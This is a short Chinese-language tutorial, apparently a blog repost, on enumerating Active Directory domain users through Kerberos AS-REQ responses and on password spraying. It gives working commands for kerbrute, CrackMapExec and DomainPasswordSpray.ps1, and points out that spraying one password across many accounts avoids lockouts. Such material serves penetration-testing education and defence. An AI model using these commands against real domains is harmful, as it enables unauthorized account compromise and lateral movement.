域用戶列舉和密碼噴灑攻擊橫向移動
目錄- 域用戶列舉和密碼噴灑攻擊橫向移動
- 一、域內用戶列舉攻擊原理
- 二、域內用戶列舉工具
- 三、密碼噴灑攻擊原理
- 四、密碼噴灑工具
一、域內用戶列舉攻擊原理
正常域用戶登錄主機,我們可以通過 "net user /domain"來列舉出域內的用戶,但是當我們用非域用戶進行登錄時,是不能使用 "net user /domain"這條命令的,或者當主機不在域內但是能與域控通信時, 以上兩種情況我們可以通過以下方法對域內用戶進行列舉,
Kerberos本身是一種基于身份認證的協議,在 Kerberos 協議認證的第一階段AS-REQ ,當用戶不存在時,回傳包提示錯誤,當用戶名存在,密碼正確和密碼錯誤時,AS-REP的回傳包不一樣,所以可以利用這點,對域內進行域用戶列舉和密碼噴灑攻擊,在AS-REQ階段客戶端向AS發送用戶名,AS對用戶名進行驗證,用戶存在和不存在回傳的資料包不一樣,所以,根據AS的回傳包來對域用戶進行列舉,
二、域內用戶列舉工具
1、kerbrute工具
kerbrute.exe userenum --dc 域控ip -d 域名 用戶名字典.txt
三、密碼噴灑攻擊原理
在確認用戶存在后,客戶端又會發送一個AS-REQ請求,如果密碼正確,則回傳AS-REP,否則回傳 KRB5KDC_ERP_PREAUTH_FAILED,
在常規的爆破中,我們都是先用很多密碼去碰撞一個賬號,這樣很容易導致賬號被鎖定,而密碼噴灑就是先用一個密碼去碰撞很多賬號,此方法能有效的避免賬號被鎖定的問題,
四、密碼噴灑工具
1、kerbrute工具
使用方式:
kerbrute.exe passwordspray -d candada.com 1.txt admin@123
2、CrackMapExec
CrackMapExec(?名 CME)是?款?常好?的密碼噴灑攻擊的?具,在 Kali Linux 默認已經安裝好,
下載地址: https://github.com/byt3bl33d3r/CrackMapExec
使用方式:
crackmapexec smb 192.168.142.10 -u name.txt -p 'admin@123' --continue-on-success
3、DomainPasswordSpray.ps1(必須是域內用戶才可以)
引數:
UserList:用戶字典
Password:單個密碼
PasswordList:密碼字典
OutFile:輸出的檔案名
Domain:要爆破的域
Force:強制噴灑繼續,而不提示確認,
使用方式:
Import-Module DomainPasswordSpray.ps1 匯入
Invoke-DomainPasswordSpray -UserList name.txt -Domain candada.com -Password admin@123
-OutFile res.txt
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554269.html
標籤:其他
下一篇:返回列表